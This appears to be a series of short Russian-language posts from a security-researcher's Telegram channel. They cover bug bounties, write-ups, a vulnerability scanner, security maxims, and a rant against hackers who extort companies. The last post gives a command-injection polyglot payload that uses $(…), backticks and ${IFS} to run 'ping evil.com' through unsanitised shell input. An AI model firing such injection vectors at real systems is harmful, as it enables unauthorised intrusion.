У порносайта Pornhub появилась программа вознаграждений за уязвимости!
https://goo.gl/YzYBM2

Сегодня и завтра на PHDays, уже есть материал для новой статьи ^_^

Массовый взлом telegram на PHDays
https://bo0om.ru/telegram-love-phdays

Уязвимость в Linkedin. Этичный хакер или злоумышленник?
https://bo0om.ru/linkedins-million-dollar-bug

Получил выплату от telegram за найденные уязвимости (хоть они и были некритичные). Приятно.

То чувство, когда фаззил оператора связи и ушёл в минус...

Vk, не болей!

SOP bypass под Firefox. Та самая штука, которая позволяет злоумышленнику, например, похищать информацию с других вкладок браузера. Или выполнять действия от имени пользователя.
http://blog.bentkowski.info/2016/07/firefox-same-origin-policy-bypass-cve.html

Как поступить с найденной уязвимостью и что делать если нет Bug Bounty программы?
http://goo.gl/fFN7SI

Бомбит от этих псевдогероев. Алчные шлюхи, которые позорят имя хакера, "продавая" свои уязвимости шантажируя компании, прикрываясь глупыми аргументами:

- за любую работу нужно платить
Нет. Если тебя не просили ломать сайт, какого хера ты требуешь деньги за найденные уязвимости. Одна компания проводит конкурс на взлом сейфа. А другая, допустим, ателье, просто пользуется сейфом, хранит там документацию. Вместо того, чтобы законно исследовать как работают сейфы и помочь первой компании, да ещё и за вознаграждение - ты идёшь ломать ателье. Через отверстие в стене достаешь документы о покупателях и требуешь деньги. Ну не мудак ли?

- ну это же компания, у них есть деньги
Не привыкай считать чужие деньги. И деньги эти не у разработчиков. Они получают свою зарплату и не могут позволить раздавать деньги из своего кошелька. Если нет бюджета - с этим ничего не поделаешь. Представь, ты приходишь домой, а у тебя открыта дверь. Сидит бомж, и говорит - плати. Ты богат, я нашёл уязвимость в твоей двери. Будешь платить?)

Пугает то, что общественность поддакивает таким выродкам.

Простите

Agava - забавный хостинг. Сломали мне блог, но в замен дали доступ на 400+ других сайтов :D
https://bo0om.ru/shared-hosting

Ребята из Vulners выпустили агентный opensource сканер безопасности для Redhat и Debian семейств линуксов.
Он не делает магии, не делает пентеста, а просто смотрит установленные пакеты и говорит какие из них уязвимы.
И в отличии от того же Nessus не тратит на это два часа - проверка занимает буквально миллисекунды!

Красная таблетка: https://vulners.com/#audit
Синяя таблетка: https://github.com/videns/vulners-scanner

Блогер Wylsacom (https://www.youtube.com/channel/UCt7sv-NKh44rHAEb-qCCxvA) случайно показал логин и пароль к сервису в приямой трансляции

Понравилось:
1. Не верьте никому и ничему.
2. Всегда предполагайте худший сценарий.
3. Применяйте многоуровневую защиту (Defence-in-Depth).
4. Придерживайтесь принципа «чем проще, тем лучше» (Keep It Simple Stupid, KISS).
5. Придерживайтесь принципа «минимальных привилегий».
6. Злоумышленники чуют неясность.
7. Читайте документацию (RTFM), но никогда ей не доверяйте.
8. Если это не тестировали, то это не работает.
9. Это всегда ваша ошибка!

В telegram появились интеграция с играми (через @gamee).

¯\_(ツ)_/¯

А может тут полноценный бложек завести?
anonymous poll

Давай! Флуди, пиши мнения, мне норм – 197
👍👍👍👍👍👍👍 75%

Лучше коротко и по существу – 64
👍👍 25%

👥 261 people voted so far.

Держи RCE вектор:

&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&'\"`0&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&`'

При недостаточной фильтрации пользовательских данных, которые попадают в bash интерпритатор, выполнится команда ping -c evil.com. На случай экранирования пробелов можно использовать ${IFS} - это пустая строка.